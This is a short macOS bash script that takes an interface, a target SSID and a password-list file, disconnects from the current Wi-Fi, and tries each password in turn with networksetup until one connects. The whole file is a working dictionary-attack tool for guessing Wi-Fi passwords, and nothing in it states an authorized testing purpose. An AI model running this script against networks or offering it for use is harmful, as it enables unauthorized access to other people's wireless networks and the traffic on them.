#!/bin/bash

# Check if the correct number of arguments are provided
if [ "$#" -ne 3 ]; then
    echo "Usage: $0 INTERFACE SSID PASSWORD_FILE"
    exit 1
fi

# Assign command line arguments to variables
INTERFACE=$1
SSID=$2
PASSWORD_FILE=$3

echo "Targeting: $SSID, on interface $INTERFACE with passlist: $PASSWORD_FILE"

# Disconnect from current Wi-Fi
sudo airport -z

# Read passwords from file and try to connect
while IFS= read -r password; do
    echo "Trying password: $password"

    # Attempt to connect to the Wi-Fi network
    connect_output=$(networksetup -setairportnetwork "$INTERFACE" "$SSID" "$password" 2>&1)

    # Check if connection was successful
    if [ -z "$connect_output" ]; then
        echo "Connected successfully with password: $password"
        exit 0
    else
        echo "Failed to connect with password: $password"
    fi
done < "$PASSWORD_FILE"

echo "All passwords tried, none worked."
